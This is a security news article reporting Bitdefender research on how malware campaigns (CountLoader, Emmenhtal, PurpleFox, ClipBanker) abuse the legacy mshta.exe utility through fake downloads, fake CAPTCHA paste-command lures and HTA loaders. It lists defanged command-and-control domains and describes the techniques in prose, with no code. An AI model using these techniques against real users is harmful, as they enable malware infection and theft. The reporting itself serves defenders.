Microsoft’s aging “mshta.exe” utility, a leftover component from Internet Explorer, is still being actively abused in modern malware campaigns years after the browser itself was retired.
According to new research from Bitdefender, attackers continue to abuse Microsoft HTML Application Host (MSHTA), a built-in Windows utility capable of executing VBScript and JavaScript from local or remote files.
Despite Internet Explorer reaching the end of life in 2022, MSHTA is packaged by default on Windows systems and is used as a living-off-the-land (LOLBIN) binary to launch malware.
“Even when companies retire legacy products, parts of their ecosystem can persist in Windows for years to support older workflows and enterprise compatibility requirements,” the researchers explained in a blog post. “Threat actors frequently abuse trusted, preinstalled Windows binaries to execute malicious content while relying on software already present on the system.”
Microsoft did not immediately comment on the issue.
Bitdefender researchers observed MSHTA appearing across infection chains associated with commodity stealers such as LummaStealer and Amatera, multi-stage loaders like CountLoader and Emmenhtal Loader, banking trojans including ClipBanker, and even the long-running PurpleFox malware family.
Infections through fake CAPTCHAs, updates
One of the most active clusters analyzed by Bitdefender involved CountLoader, an HTA-based loader that used MSHTA to deliver infections with LummaStealer and Amatera. Attackers relied on fake software downloads, cracked applications, SEO-poisoned websites, and social engineering to lure victims into executing malicious payloads.
Victims downloaded password-protected archives containing legitimate-looking installers. But clicking through them executed a legitimate Python interpreter bundled with malicious scripts that ultimately launched a renamed copy of mshta.exe.
The binary then contacted a C2 infrastructure hosting HTA payloads for next-stage malware retrieval.
“Starting in late February 2026, we observed a new CountLoader domain-hosting pattern,” the researchers noted. “The naming convention remained similar, using domains that imitate legitimate service names, but the infrastructure shifted to .vg and .gl TLDs. Examples include explorer[.]vg, ccleaner[.]gl, and microservice[.]gl.”
Threat actors also ran Emmenhtal Loader campaigns that abused fake CAPTCHA verification pages distributed through Discord phishing messages. Victims were tricked into copying malicious commands into the Windows Run dialog under the pretext of “prove you are human”.
MSHTA executed obfuscated HTA payloads in memory before launching PowerShell to fetch additional malware, ultimately delivering LummaStealer in one analyzed case.
A legacy Windows tool that refuses to die
Bitdefender’s findings suggest MSHTA remains attractive because it checks several boxes attackers like. These include it being Microsoft-signed, preinstalled on Windows, capable of in-memory execution, and still implicitly trusted in many environments.
Other sophisticated campaigns picked it up too. Bitdefender detailed PurpleFox using MSHTA to launch ‘msiexec’ commands that downloaded MSI payloads posing as PNG images from remote IP addresses.
PurpleFox, once installed, operates as a rootkit-enabled backdoor capable of persistence, surveillance, information theft, and distributed denial-of-service (DOS) activity.
Elsewhere, ClipBanker campaigns used HTA loaders to execute Base64-encoded PowerShell commands that established persistence through scheduled tasks posing as legitimate Windows services. The malware ultimately hijacked cryptocurrency wallet addresses copied to victims’ clipboards.
Bitdefender cautioned that not every MSHTA execution is inherently malicious. “ A significant portion of detections came from the update mechanism of DriverPack, an older software package that downloads driver files from third-party sources rather than through official Microsoft update channels,” the researchers pointed out.
Still, they argued the balance has clearly shifted toward abuse.